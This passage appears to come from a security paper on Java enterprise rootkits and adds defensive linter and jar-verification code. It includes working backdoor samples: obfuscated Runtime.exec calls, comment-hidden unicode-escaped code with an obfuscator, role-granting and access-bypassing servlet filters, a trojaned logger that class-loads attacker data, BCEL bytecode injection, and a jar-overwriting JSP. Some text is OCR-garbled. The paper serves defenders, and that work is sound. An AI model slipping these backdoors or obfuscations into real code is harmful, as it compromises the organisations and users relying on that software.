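    public static List<String> weakeningFlags(List<String> jvmArgs) {
        List<String> found = new ArrayList<String>();
        for (String arg : jvmArgs) {
            for (String prefix : WEAKENING_PREFIXES) {
                if (arg.startsWith(prefix)) { found.add(arg); break; }
            }
        }
        return found;
    }

    public static void main(String[] args) {
        System.out.println("String.value can be made accessible: " + canOpenStringValue());
        System.out.println("JDK 6-style count field present:      " + hasCountField());
        System.out.println("Weakening launch flags:               " + weakeningFlags());
        // Constructed argument list standing in for a JVM whose encapsulation was opened up:
        List<String> constructed = Arrays.asList("-Xmx2g", "--add-opens=java.base/java.lang=ALL-UNNAMED");
        System.out.println("Constructed example flags:            " + weakeningFlags(constructed));
    }
}
```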

Abusing Reflection (Part 2)
Reflection can be used to obfuscate within a Java file as well. In the first example, a Base64 encoded string is decoded to "java.lang.Runtime|exec|java.lang.String|getRuntime|calc" and then used with reflection to invoke Runtime.exec() on the "calc" Windows program.
String[] x = new String( new BASE64Decoder().decodeBuffer(
"amF2YS5sYW5nLlJ1bnRpbWV8ZXhlY3xqYXZhLmxhbmcuU3RyaW5nfGdldFJ1bnRpbWV8Y2FsYw==") )
.split("\\|");
Class.forName(x[0]).getMethod(x[1],new Class[]{Class.forName(x[2])})
.invoke(Class.forName(x[0]).getMethod(x[3],null).invoke(null,null),new Object[]{
x[4]});

Abusing Code Formatting
Simple formatting tricks may fool weak code reviewers into missing critical code. For example, whitespace can be used to move code past the visible editor window. In the late 1980's, the author used this technique in VMS DCL scripts to play tricks on unwary colleagues. Graphical IDEs are only slightly better at helping code reviewers notice this kind of trickery.
Also, Java allows a peculiar type of obfuscation in the formatting of source code. To support Unicode strings, you can encode characters with the \uHHHH format, even normal ASCII alphanumeric characters. Using this technique, an attacker can inject real code into a commented out block, as shown below. The trick is that the \u002a\u002f sequence is really the */ characters, which closes the comment and enters an executable code context. The \u002f\u002a sequence at the end of the lines opens a new comment, making the entire block appear to be commented out. The // type of comment, semicolons, quoted strings, and other syntax also afford opportunities for attackers to use this technique. Different editors deal with encoded characters differently, making this issue difficult to notice.
Here is an entire Java file that an attacker might insert in a software baseline.
/*\u002a\u002f\u0070\u0075\u0062\u006c\u0069\u0063\u0020\u0063\u006c\u0061\u0073
\u0073\u0020\u0053\u0069\u006d\u0070\u006c\u0065\u0020\u007b\u002f\u002a
/*\u002a\u002f\u0070\u0075\u0062\u006c\u0069\u0063\u0020\u0073\u0074\u0061\u0074
\u0069\u0063\u0020\u0076\u006f\u0069\u0064\u0020\u006d\u0061\u0069\u006e\u0028
\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0061\u0072\u0067\u0073
\u0029\u0020\u0020\u007b\u002f\u002a
/*\u002a\u002f\u0064\u0028\u0022\u006e\u006f\u0074\u0065\u0070\u0061\u0064\u0022
\u0029\u003b\u002f\u002a
/*\u002a\u002f\u007d\u002f\u002a
/*\u002a\u002f\u002f\u002a
/*\u002a\u002f\u0070\u0072\u0069\u0076\u0061\u0074\u0065\u0020\u0073\u0074\u0061
\u0074\u0069\u0063\u0020\u0076\u006f\u0069\u0064\u0020\u0064\u0028\u0020\u0053
\u0074\u0072\u0069\u006e\u0067\u0020\u0078\u0020\u0029\u0020\u007b\u002f\u002a
/*\u002a\u002f\u0074\u0072\u0079\u007b\u0020\u0052\u0075\u006e\u0074\u0069\u006d
\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028
\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0078\u0029\u003b\u0020\u007d\u0020
\u0063\u0061\u0074\u0063\u0068\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069
\u006f\u006e\u0020\u0065\u0020\u0029\u0020\u007b\u007d\u002f\u002a
/*\u002a\u002f\u007d\u002f\u002a
/*\u002a\u002f\u007d

The decoded version of this class is shown below.
public class Simple {
public static void main(String[] args) {
d("notepad");
}

private static void d( String x ) {
try{ Runtime.getRuntime().exec(x); } catch(Exception e ) {}
}
}

Here are three different examples of how this trick can be used for obfuscating calls to Runtime.exec(). Of course the characters in "Runtime.exec()" could be obfuscated too.
System.out.println("test\u0022\u0029\u003BRuntime.getRuntime().exec(args[0] );

System.out.println("test\u0022\u0029\u003BRuntime.getRuntime().exec(args[0]
\u0029\u003BClass.forName\u0028\u0022Escape");

String s = "notepad";
/*
* Be sure to use a salt with your encryption such as:
* \\\uuuuuuuuuuuuuu002a\u002f\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e
\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029
\u002e\u0065\u0078\u0065\u0063\u0028\u0073\u0029\u003b\u002f\u002a
* See http://www.owasp.org/index.php/ESAPI for more details
*/

Below is a tool that will decode this type of encoding in Java source code. It handles some perverse forms of encoding that the Java compiler will accept, including multiple "\" and "u" characters. Running this type of tool before a code review may help to prevent this type of attack from sneaking through. Although time did not permit checking the various static analysis tools to see if they handle these encodings, it would make interesting research.
import java.io.*;
import java.util.regex.*;

/* Decodes Java code encoded with the \\uHHHH format */
public class JavaSourceDeobfuscator {

private static Pattern regex = Pattern.compile( "\\\\+u+[0-9a-fA-F]{4}");
private static boolean decoded = false;

public static void main(String[] args) throws Exception {
StringBuffer sb = new StringBuffer();
BufferedReader fr = new BufferedReader( new FileReader( new File(args[0]) ) );
String line = null;
while( (line=fr.readLine() ) != null ) {
sb.append( unescapeLine( line ) + "\n");
}
if ( decoded ) {
FileWriter fw = new FileWriter( new File(args[0]+".decoded" ) );
fw.write( sb.toString() );
fw.close();
}
}

private static String unescapeLine( String line ) {
StringBuffer sb=new StringBuffer();
int index = 0;
Matcher matcher = regex.matcher( line );
while( matcher.find(index) ) {
sb.append( line.substring( index, matcher.start() ) );
sb.append( decode( line.substring( matcher.start(), matcher.end() ) ) );
decoded = true;
index = matcher.end();
}
sb.append( line.substring(index ) );
return sb.toString();
}

private static char decode( String value ) {
String num = value.replace("u", "" ).replace("\\", "" );
try {
return (char)Integer.parseInt( num, 16 );
} catch( NumberFormatException e ) {
return '?';
}
}
}
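Added here as a review-gate check rather than a decoder, and not part of the paper's tool: a linter that applies the compiler's backslash-eligibility rule (JLS 3.3) and reports only the escapes that have no honest reason to exist, leaving genuine non-ASCII escapes alone. The sample source in main() is constructed.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/*
 * Review-gate check for the \\uHHHH trick. It rewrites nothing: it reports every
 * escape that javac would honour (JLS 3.3: a backslash starts an escape only when
 * preceded by an even number of backslashes, and any number of u's is allowed)
 * whose decoded value is printable ASCII or a line terminator. Those have no
 * legitimate reason to be escaped and are exactly what closes a comment or ends
 * a // line early. Escapes for non-ASCII characters are not reported.
 */
public class UnicodeEscapeLinter {

    /* One backslash, one or more u's, four hex digits. Eligibility of the
       backslash is checked separately, since it depends on what precedes it. */
    private static final Pattern ESCAPE = Pattern.compile("\\\\(u+)([0-9a-fA-F]{4})");

    public static final class Finding {
        public final int line;       // 1-based line number
        public final String escape;  // raw text as it appears in the source
        public final char decoded;
        public final String reason;
        Finding(int line, String escape, char decoded, String reason) {
            this.line = line; this.escape = escape; this.decoded = decoded; this.reason = reason;
        }
        @Override public String toString() {
            String shown = decoded == '\n' ? "LF" : decoded == '\r' ? "CR" : "'" + decoded + "'";
            return "line " + line + ": " + escape + " -> " + shown + " (" + reason + ")";
        }
    }

    /* JLS 3.3 eligibility: count the contiguous backslashes before position idx. */
    static boolean eligible(String line, int idx) {
        int run = 0;
        for (int i = idx - 1; i >= 0 && line.charAt(i) == '\\'; i--) run++;
        return run % 2 == 0;
    }

    public static List<Finding> lint(String source) {
        List<Finding> out = new ArrayList<Finding>();
        String[] lines = source.split("\n", -1);
        for (int ln = 0; ln < lines.length; ln++) {
            Matcher m = ESCAPE.matcher(lines[ln]);
            while (m.find()) {
                if (!eligible(lines[ln], m.start())) continue;  // javac keeps this as literal text
                char c = (char) Integer.parseInt(m.group(2), 16);
                String reason = null;
                if (c == '\n' || c == '\r') {
                    reason = "line terminator: ends a // comment and starts code";
                } else if (c == '*' || c == '/') {
                    reason = "comment delimiter: can open or close a /* */ block";
                } else if (c >= 0x20 && c <= 0x7e) {
                    reason = "printable ASCII written as an escape";
                }
                if (reason != null) out.add(new Finding(ln + 1, m.group(), c, reason));
            }
        }
        return out;
    }

    public static void main(String[] args) {
        // Constructed sample: the paper's "salted comment" shape plus two cases the
        // eligibility rule must get right (an escaped backslash and a real non-ASCII escape).
        String sample = String.join("\n",
            "String s = \"notepad\";",
            "/*",
            " * \\\\\\u002a\\u002f Runtime.getRuntime().exec(s); \\u002f\\u002a",
            " */",
            "String path = \"C:\\\\u0041\";",
            "String lambda = \"\\u03bb\";",
            "// harmless note \\u000a Runtime.getRuntime().exec(s);");
        for (Finding f : lint(sample)) System.out.println(f);
    }
}
```

Run against the sample, it reports the four comment delimiters on line 3 and the line terminator on line 7, and stays silent on the escaped backslash (line 5) and the Greek letter (line 6).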

If you need some obfuscated code to experiment with, you can use this code obfuscator. It escapes all the code in the \uHHHH format and adds /* comments to make the code look commented out.
import java.io.*;

/* Obfuscates Java code with the \\uHHHH format and comments */
public class JavaSourceObfuscator {

public static void main(String[] args) throws Exception {
// all input files are concatenated into one encoded output named after the first
FileWriter w = new FileWriter( new File(args[0]+".encoded" ) );
w.write( "\\u002f\\u002a");
for (int j = 0; j < args.length; j++) {
BufferedReader r = new BufferedReader(new FileReader(new File(args[j])));
String line = null;
while( (line=r.readLine() ) != null ) {
w.write( escapeLine( line ) + "\n" );
}
r.close();
}
// write the closing comment and close the output once, after all input files
w.write( "\\u002a\\u002f\n");
w.close();
}

private static String escapeLine( String line ) {
StringBuffer sb=new StringBuffer();
for ( int i = 0; i < line.length(); i++ ) {
// charAt() yields a UTF-16 unit, which always fits the four hex digits of \\uHHHH
int cp = line.charAt(i);
sb.append( "\\u" + toHex( cp ) );
}
// close the enclosing comment before the code and reopen it afterwards
return( "\\u002a\\u002f" + sb.toString() + "\\u002f\\u002a");
}

private static String toHex( int x ) {
String hex = Integer.toHexString(x);
return "0000".substring(hex.length() ) + hex;
}
}

If you are interested in a challenge, Google Code Search turned up this Java program obfuscated in this way. The code does some interesting things, but is obfuscated with other methods as well. Good luck.
http://extrods.googlecode.com/svn/trunk/clients/jargon/src/api/edu/sdsc/grid/io/Lucid.java
Abusing Inversion of Control
Many of the more popular Java web application frameworks rely on "inversion of control." This design pattern or architectural approach [12] involves having your custom code invoked by the framework, rather than writing code to direct the flow of execution.
The use of complex frameworks adds a task to the job of reviewing code. The reviewer must understand how the framework works, what code will be executed, and in what order. Otherwise, the attacker may be able to put code in a plugin, extension, page, control, action, or some other part of the framework that is invoked but is not obvious.
Abusing Architecture
In most applications, there are pieces of code that are somewhat external to the main application. For example, the application might include a gzip filter that compresses HTML pages on the way out of the application. These pieces of code are tempting locations for a malicious developer, as they are frequently not developed and deployed in the same way as the main application.
For example, an attacker might sneak the following code into a Java EE Filter to add a special backdoor that grants them all roles. In this example, an HttpServletRequestWrapper is used to override the isUserInRole() method, so that when the attacker sends the codeword, they are considered to be in every role.
public void doFilter(ServletRequest request, ServletResponse response, FilterChain
chain) throws IOException, ServletException {
HttpServletRequest r = new HttpServletRequestWrapper((HttpServletRequest)request){
public boolean isUserInRole( String role ) {
String x = getHeader("backdoor");
return ( x != null && x.equals( "true" ) ? true :
super.isUserInRole(role) );
}
};
chain.doFilter(r, response);
}

Another way to use Java EE Filters is to get around Java authentication and access control as defined in web.xml. The <security-constraint> rules are not applied when the RequestDispatcher is used to forward or include files. Therefore, an attacker who can insert code into a Java filter might be able to bypass otherwise strong security rules.
public void doFilter(ServletRequest request, ServletResponse response, FilterChain
chain) throws IOException, ServletException {
HttpServletRequest req = (HttpServletRequest)request;
String x = req.getParameter("backdoor");
if ( x == null || !x.equals( "true" ) ) {
// not the codeword: behave like an ordinary pass-through filter
chain.doFilter(request, response);
return;
}
// rebuild the requested path and re-dispatch it; the container does not apply
// <security-constraint> checks to a RequestDispatcher forward
String target = req.getServletPath();
if (req.getPathInfo() != null) target += req.getPathInfo();
if (req.getQueryString() != null) target += "?"+req.getQueryString();
request.getRequestDispatcher(target).forward(request, response);
}
4. Hiding from Code Analysis Tools
There are several tools on the market that search source code for security problems. Some of the techniques for turning data into code in order to hide from human code reviewers will also be effective against some tools. But code analysis tools have a different set of strengths and weaknesses against these techniques than human analysts do.
Tools are not fooled by semantics, and so an attacker cannot use many of the tricks that fool humans. However, tools are limited in their understanding of what the code is supposed to do. This makes it impossible for them to recognize many instances of malicious code.
In fact, the easiest way for a malicious developer to get around static analysis is to create an attack that involves something the static code analysis engine simply can't understand. Since there is no way to teach the tool the business rules, it can't check the code for violations of those rules.
Another advantage a malicious insider has is that they probably know what code analysis tools the organization is using, and so they can run the tools themselves to make sure their flaw is not detected by the tools in use. This is no different from the advantage that virus authors have. Virus writers get to run all the anti-virus tools against their new virus before they release it into the wild, significantly reducing the likelihood of detection.
The following discusses a few of the many ways that a malicious developer might try to avoid detection by static analysis tools. Most of these techniques would also be very difficult for a manual code reviewer to understand and identify.
Abusing Validation
Data flow analysis traces untrusted input through an application from sources to sinks. Frequently, these data flows are used to find injection issues like XSS, SQL injection, command injection, etc. Without data flow analysis, it is difficult to tell whether a particular source to sink path is actually exploitable. Whether you should use proper security controls everywhere, or just fix the holes that have been proven to be exploitable through full source to sink data flow analysis, is a topic for a different paper.
Untrusted input comes from many sources: not just end users, but also backend systems, services, directories, and any other source that doesn't guarantee the safety of the data. Static analysis tools trace this untrusted data to dangerous methods, known as "sinks," but they stop if the data is validated. One way to avoid being detected by static analysis is to sneak dangerous input through the validation methods or to deliberately weaken the validation methods to allow attacks to pass through.
Developers are quite creative about bypassing validation rules. In a recent code review, a major financial organization had an application where the developers couldn't get the data they needed through the validation filter, so they base64 encoded it in the client and then decoded it in the business logic after the filter. This deliberate technique was most likely not a malicious approach, and it solved the developer's "problem." However, it also allowed injection attacks because the data was now essentially unvalidated. Below is an example of using this technique maliciously to avoid static analysis checks.
import java.io.IOException;
import java.util.regex.Pattern;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class TaintWrecker extends HttpServlet {

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws
ServletException, IOException {
String x = req.getParameter( "x" );
// the parameter is base64 decoded before it reaches validate(), so the "validated"
// value is whatever the client encoded
x = new String( new sun.misc.BASE64Decoder().decodeBuffer(x) );
if ( validate( x ) ) {
// continue business function, including execute SQL query containing x
} else {
log( "Validation problem with " + x );
}
}

// a method a data flow tool will treat as a sanitizer, regardless of what it actually permits
Pattern p = Pattern.compile( "^[A-Za-z0-9\\\\\\/\\=\\-+.]*$");
public boolean validate( String value ) {
try {
if ( p.matcher(value).matches() ) return true;
} catch (Exception e ) {
}
return false;
}
}
Abusing EJBs, Maps, and Databases to Prevent Data Flow Analysis
Another way that developers can avoid untrusted data checks by static analysis tools is to put the data into storage in a way that the tool can't trace, for example storing the data in a database with one query and retrieving it with another. The static analysis tools can't parse queries if they are generated at runtime, so they can't know which data in the database is tainted and which is clean.
This happens with many different types of architectural patterns involving data flow. Persistence layers, various types of maps, request attributes, session attributes, services, beans, DTOs, and other storage can confuse data flow engines. A common example of this problem occurs when searching for possible XSS problems. In the example below, a request is passed into a bean constructor which pulls out the needed parameters and stores them without any validation or escaping. The bean is put into a request attribute which is later retrieved in a JSP page. The data is pulled from the bean and put into the web page, again without validation or escaping.
...in the code...
// the business function creates a bean with the request
AddressHelper helper = new AddressHelper(request);

// inside the bean, the data is extracted from the request
this.url = request.getParameter("url");

// the bean is set as a request attribute
request.setAttribute("address_helper", helper);

...in the JSP...
<%
// the JSP extracts the bean and sets up the data for the page
AddressHelper helper = (AddressHelper)request.getAttribute("address_helper");
String url = helper.getUrl();
%>
document.contentForm.action='<%=url%>'
Abusing Built-in Callbacks to Call Seemingly Dead Code
One way to confuse flow analysis is to use the automatic callbacks built into the Java runtime to call your code. The JDK is riddled with these callbacks that invoke code without any obvious trace in the source code. The use of equals(), compareTo(), hashCode(), and toString() methods in the Collections API is well known. The finalize() method on any class will run when the object is garbage collected.
Tools that don't follow the control flow into all of the Java runtime libraries will not be able to follow these paths and may wrongly conclude that the code is dead. The two examples below show how methods will be invoked even if they are not explicitly invoked.
// this code will call HostileException.getMessage()
try {
...
} catch( Exception e ) {
e.printStackTrace();
}

// this code will call Puppies.run()
new Thread( new org.innocent.Puppies( req.getParameter( "z" ) ) ).start();
Abusing Reflection to Invoke Hidden Attacks
The Java Reflection API is extremely powerful, and most modern frameworks like Struts, Spring, Hibernate, JUnit, and others rely on it. Not surprisingly, reflection is typically available in enterprise Java environments.
Reflection can be used by attackers to make it difficult for static analysis tools to follow their code. In the simple example below, the system Runtime is looked up and the exec() method is called to start the Windows notepad. The strings used as parameters in the call can be obfuscated in any number of ways to make it difficult for the static analysis engine to figure out what the values should be. The strings could even be sent in at runtime to prevent static analysis entirely.
String a = "java.lang.Runtime";
String b = "getRuntime";
String c = "notepad";
((Runtime)Class.forName(a).getMethod(b,null).invoke(null, null)).exec(c);
Other Techniques
Again, this is not intended to be a comprehensive list. Rather, these topics are a starting point for the research we need to be doing to prevent malicious code.

5. Trojaning the Java Platform, Container, and Libraries
The risk of Java enterprise rootkits is not limited to malicious insiders. Hackers can target organizations by attempting to get malicious code into their software supply chain. External attackers might attempt to put malicious code in any of the code that your enterprise applications depend on.
A developer who wants to cover his tracks and make an attack work in lots of different environments might consider targeting the jars in the web container or the Java runtime environment. These products contain lots of code on which the enterprise application depends.
The custom code written specifically for your application depends on the libraries you reference, jar files from your container, jar files installed into your Java runtime, and the standard Java runtime jar files. In the previous sections, we discussed attacks against custom code. In this section, we'll discuss how an attacker might trojan the jar files in the rest of the stack. There are an infinite number of ways to trojan this code, but we'll examine a few just to demonstrate the ease of this type of attack.
How easy or hard this attack is to execute depends entirely on the people, processes, and tools used to develop a library and how it is deployed. The difficulty has very little to do with whether the code is sold commercially or made available under an open source license.
Trojaning Library Source Code
Virtually every Java application references a number of jar files. Every one of these jar files is available to the malicious developer, which means that your enterprise is trusting all the code in them. There are a number of different ways that a malicious developer might use these libraries to attack an enterprise.
Simply getting malicious code into a jar file is not sufficient for the attack. In addition, the attacker has to make sure that the jar file is available on the application's classpath. Also, the attacker has to call the malicious code. Simply referencing the trojaned class is generally enough to get it classloaded, which will run the code in the static initializer of the class.
Conceptually, the simplest attack is for the external attacker to contribute malicious code to a library. This is possible for both commercial and open source libraries. In either case, the hardest part of the attack is becoming a developer on the project and gaining rights to commit code to the repository.
The attacker might achieve this by contributing a patch to the project lead that gets included without close review. Alternatively, the attacker might build trust by contributing useful modifications until they have earned a spot as a project committer. At that point, there are generally no restrictions on the modifications that the attacker can make. An innocent enterprise developer will then download the library, put it on the classpath, and the application will invoke a method that contains the malicious code.
Trojaning Popular Open Source Libraries
One of the most devastating malicious attacks possible would be to trojan a very popular library like Log4j, Struts, Spring, or Apache Commons. These libraries are used in a broad range of applications across a variety of sectors. Imagine what would happen if an attacker successfully trojaned the Log4j library, which is used in a huge number of financial institutions, and in other industries as well. This is most likely the fastest and easiest way to compromise our nation's financial system.
Imagine that Log4j contains special backdoor code that only runs when a certain sequence of data is logged. In the hypothetical example code below, the attacker has trojaned the Logger.logWarn() method by wrapping the input in a call to a new sanitize() method. The sanitize() method, which could be named anything and located anywhere on the classpath, is intended to strip all non-alphanumeric input from the log message. It also includes malicious code that extracts chunks of bytecode from the messages being sanitized, assembles them into a complete base64 encoded class file, and invokes the classloader to run it. The loaded class contains the real payload, which could be any arbitrary Java code. The attacker could exploit organizations at will, simply by sending attacks in a short series of URLs. Applications that use the library to log URLs would get exploited. The rootkit is effective because, unfortunately, most enterprises use libraries like Log4j without checking them for malicious code. The example below is only slightly obscured, but most reviewers would be looking in a logging method for log injection, not a malicious classloader attack.
private static StringBuffer messageBuilder = new StringBuffer();
Pattern p = Pattern.compile("^[A-Za-z0-9]*$");

public void logWarn( String message ) {
try {
out.println( new Date() + ":" + sanitize(message) );
} catch( Exception e ) {}
}

private String sanitize( String input ) throws Exception {
// handle TLA multipart Unicode byte ordering - http://www.ietf.org/RFC31337.html
int index = input.indexOf( 0xFFFE );
int lastIndex = input.indexOf( 0xFFFF );
if ( index != -1 || lastIndex != -1 ) {
messageBuilder.append( input.substring( Math.max(index, lastIndex) + 1 ) );
}
if ( lastIndex != -1 ) {
BadClassLoader.loadEvil( messageBuilder.toString() );
messageBuilder.setLength(0);
}
StringBuilder sb = new StringBuilder();
for ( int i = 0; i < input.length(); i++ ) {
if (Character.isLetterOrDigit(input.charAt(i))) sb.append(input.charAt(i));
}
return sb.toString();
}

http://www.example.com/app?attack_part1=%FF%FEa98dfjlkajf...
http://www.example.com/app?attack_part2=%FF%FF2efas0dfjwals...
Trojaning Class Files
Rather than using a direct attack, an attacker might instead write code that modifies the bytecode of a trusted Java class file to include an attack. This can be accomplished with any of several bytecode engineering libraries available, including ASM and BCEL. Fortunately for the attacker, the BCEL library is present in the standard rt.jar provided by Sun. Other Java implementations may not have this capability.
To execute this attack, the malicious developer could plant a static method anywhere in the application. Other techniques could be used to obfuscate this method. The purpose of this method is to install a trojan into a selected method. The code parses the bytecode, finds the method, extracts the instruction list, inserts several new instructions, replaces the modified method in the class file, and saves the file back to the file system.
In the example below, a call to Runtime.getRuntime().exec() is inserted in the trojaned method. The developer makes an innocent looking call to install the trojan. In this case, the Puppy.toString() method is modified. The call to System.out.println() will call toString() and execute "notepad.exe".
import java.io.FileOutputStream;
import org.apache.bcel.Constants;
import org.apache.bcel.classfile.ClassParser;
import org.apache.bcel.classfile.JavaClass;
import org.apache.bcel.classfile.Method;
import org.apache.bcel.generic.*;
// the copy bundled in rt.jar lives under com.sun.org.apache.bcel.internal instead

// somewhere in the code
...
rainbow( "WEB-INF/classes/Puppy.class", "toString" );
System.out.println( new Puppy() );
...

public static void rainbow( String cfp, String methodName ) throws Exception {
JavaClass clazz = new ClassParser( cfp ).parse();

// find the method
// Method m = clazz.getMethod( Puppy.class.getMethod( method, null ));
Method originalMethod = null;
Method[] methods = clazz.getMethods();
for (int i = 0; i < methods.length; i++) {
if (methodName.equals(methods[i].getName())) {
originalMethod = methods[i]; break;
}
}

// A big thank you to BCEL team and Sun for including the BCELifier in the JDK
// String[] options = { "bin/Exec.class" }; BCELifier._main( options );
ClassGen cg = new ClassGen(clazz);
ConstantPoolGen cpg = cg.getConstantPool();
InstructionFactory _factory = new InstructionFactory( cg, cpg);
MethodGen mg = new MethodGen( originalMethod, cg.getClassName(), cpg );

// create exec instructions
InstructionList exec = new InstructionList();
exec.append(_factory.createInvoke("java.lang.Runtime", "getRuntime",
new ObjectType("java.lang.Runtime"), Type.NO_ARGS, Constants.INVOKESTATIC));
exec.append(new PUSH(cpg, "notepad.exe"));
exec.append(_factory.createInvoke("java.lang.Runtime", "exec",
new ObjectType("java.lang.Process"), new Type[] { Type.STRING },
Constants.INVOKEVIRTUAL));
exec.append(InstructionConstants.POP);

// if it's not already there, insert at the beginning of the method
InstructionList il = mg.getInstructionList();
if ( !il.getInstructions()[0].toString( cpg.getConstantPool() ).contains(
"java/lang/Runtime/getRuntime()" ) ) il.insert(exec);

// replace the old method with the new one
mg.stripAttributes(true);
mg.setMaxStack();
mg.setMaxLocals();
cg.replaceMethod( originalMethod, mg.getMethod() );
il.dispose();
FileOutputStream fos = new FileOutputStream(cfp);
cg.getJavaClass().dump(fos);
fos.close();
}
Trojaning Library Jar Files
Most developers simply download prebuilt jar files from open source projects or commercial vendors. This creates an opportunity for malicious developers to deliver their attack in the compiled version without leaving traces in source code.
One simple way to do this is during the build process. The person charged with creating the deliverable jar file simply starts with the code in the repository, adds malicious code, completes the build, and posts the result. The build script, or something invoked during the build, might be modified to perform these steps automatically.
An insider in your organization could also perform this attack by modifying a library class file after it has been downloaded and before it is included in your application. If the source code for the library is available, then the attacker can just make changes, recompile, and replace it in the jar file. Sealing and signing jar files can prevent this sort of tampering, but they are very infrequently used.
If source code is not available, then the attacker can use a tool like 'jad' to reverse engineer the class file and then edit the source code.
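An added defender-side counterpart, not code from the paper: a deploy-time check that fingerprints and verifies every jar on the classpath and, generalizing to the extension directories discussed under Trojaning Java Installation below, reports unpinned hashes, failed digests, unsigned entries, and signer identities. The pinned hash in main() is a placeholder; everything else uses only the standard library.

```java
import java.io.*;
import java.security.CodeSigner;
import java.security.MessageDigest;
import java.security.cert.X509Certificate;
import java.util.*;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;

/*
 * Deploy-time baseline over every jar this JVM will consult: the application
 * classpath plus the extension directories that the default java.policy grants
 * AllPermission. Per jar: SHA-256 against a pinned inventory, whether the signed
 * digests still verify, how many entries carry no signature, and who signed it.
 */
public class JarBaselineCheck {
    public static final class Report {
        public final String path, sha256;
        public final boolean pinned, tampered;
        public final int entries, unsignedEntries;
        public final Set<String> signers;
        Report(String path, String sha256, boolean pinned, boolean tampered,
               int entries, int unsignedEntries, Set<String> signers) {
            this.path = path; this.sha256 = sha256; this.pinned = pinned; this.tampered = tampered;
            this.entries = entries; this.unsignedEntries = unsignedEntries; this.signers = signers;
        }
        /* Anything true here deserves a human look before the jar ships. */
        public boolean suspicious() { return !pinned || tampered || unsignedEntries > 0; }
        @Override public String toString() {
            return path + " sha256=" + sha256 + " pinned=" + pinned + " tampered=" + tampered
                 + " unsigned=" + unsignedEntries + "/" + entries + " signers=" + signers;
        }
    }

    /* SHA-256 of the jar bytes on disk, the value a pinned inventory records. */
    public static String sha256(File f) throws Exception {
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        try (InputStream in = new FileInputStream(f)) {
            byte[] buf = new byte[8192];
            for (int n; (n = in.read(buf)) != -1;) md.update(buf, 0, n);
        }
        StringBuilder sb = new StringBuilder();
        for (byte b : md.digest()) sb.append(String.format("%02x", b));
        return sb.toString();
    }

    /* JarFile(jar, true) checks an entry's manifest digest only while the entry is read,
       and getCodeSigners() is valid only after it was read to EOF, so every entry is
       drained. JarFile verifies the signature math, not whether the signer is one you
       trust; the signer subjects are collected so that can be compared with policy. */
    public static Report inspect(File jar, Set<String> pinnedHashes) throws Exception {
        int entries = 0, unsigned = 0; boolean tampered = false;
        Set<String> signers = new TreeSet<String>();
        try (JarFile jf = new JarFile(jar, true)) {
            for (Enumeration<JarEntry> e = jf.entries(); e.hasMoreElements();) {
                JarEntry je = e.nextElement();
                if (je.isDirectory() || je.getName().startsWith("META-INF/")) continue;
                entries++;
                try (InputStream in = jf.getInputStream(je)) {
                    byte[] buf = new byte[8192];
                    while (in.read(buf) != -1) { /* drain so the digest gets checked */ }
                } catch (SecurityException se) {
                    tampered = true;   // bytes no longer match the signed manifest digest
                    continue;
                }
                CodeSigner[] cs = je.getCodeSigners();
                if (cs == null || cs.length == 0) { unsigned++; continue; }
                for (CodeSigner c : cs) {
                    X509Certificate leaf = (X509Certificate) c.getSignerCertPath().getCertificates().get(0);
                    signers.add(leaf.getSubjectX500Principal().getName());
                }
            }
        }
        String hash = sha256(jar);
        return new Report(jar.getPath(), hash, pinnedHashes.contains(hash), tampered, entries, unsigned, signers);
    }

    /* Classpath entries (split with File.pathSeparator, not a hard-coded ";") plus every
       *.jar in the extension directories; java.ext.dirs is null on JDK 9 and later. */
    public static List<File> jarsToCheck() {
        List<File> jars = new ArrayList<File>();
        for (String cp : System.getProperty("java.class.path", "").split(File.pathSeparator)) {
            if (cp.endsWith(".jar")) jars.add(new File(cp));
        }
        String ext = System.getProperty("java.ext.dirs");
        if (ext != null) {
            for (String dir : ext.split(File.pathSeparator)) {
                File[] found = new File(dir).listFiles();
                if (found == null) continue;
                for (File f : found) if (f.getName().endsWith(".jar")) jars.add(f);
            }
        }
        return jars;
    }

    public static void main(String[] args) throws Exception {
        // placeholder: real values come from your own approved-artifact inventory
        Set<String> pinned = new TreeSet<String>(Arrays.asList("<sha256 of an approved jar>"));
        for (File jar : jarsToCheck()) {
            Report r = inspect(jar, pinned);
            System.out.println((r.suspicious() ? "REVIEW " : "ok     ") + r);
        }
    }
}
```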
Trojaning Java Runtime Jar Files
An attacker could include code in their application that will modify a platform jar file to include an attack. The jar files are easy to find via the classpath. Then the attacker can use the Apache bytecode editing library BCEL, which is conveniently included in the Java runtime, to modify and replace one of the system classes in place.
// File.pathSeparator is ";" on Windows and ":" elsewhere
String[] jars = System.getProperty("java.class.path" ).split( File.pathSeparator );
for ( int i=0; i < jars.length; i++ ) if ( jars[i].endsWith( ".jar" ) ) {
// Trojan it
}

Using BCEL on a jar file is quite easy, as it supports reading classes from a jar file natively. This allows the attacker to open a jar file and search out a particular class to parse. The attacker might write the modified class out to a directory on the classpath. Modifying jar files in place takes a bit more work, but is possible. [11]
// BCEL example of trojaning a class file in a Jar file
JavaClass clazz = new ClassParser( "C:/Java/jdk15/jre/lib/rt.jar",
"java/lang/String.class").parse();
...more code to modify String.class and replace in jar file
Trojaning Java Installation
An aLLacker mlahL also Lrv Lo modlfv someLhlna ln Lhe !ava runLlme envlronmenL. An aLLacker could
replace a blnarv, buL modlfvlna a class flle mlahL be more dlfflculL Lo deLecL. Cn Wlndows, Lhls Lvpe of
aLLack falls lf Lhe !ava runLlme ls lnsLalled ln Lhe roaram llles dlrecLorv. ALLempLs Lo wrlLe Lo flles ln Lhls
directory appear to work but are not actually committed to the filesystem. If the Java runtime is installed elsewhere, this protection does not apply.
<%@page import="java.io.*"%>
<html>
<body>
<%
byte[] bytes = request.getParameter("x").getBytes();
// FileWriter writes characters; raw bytes need a FileOutputStream
new FileOutputStream(new File("C:/Java/jdk15/jre/lib/jce.jar")).write( bytes );
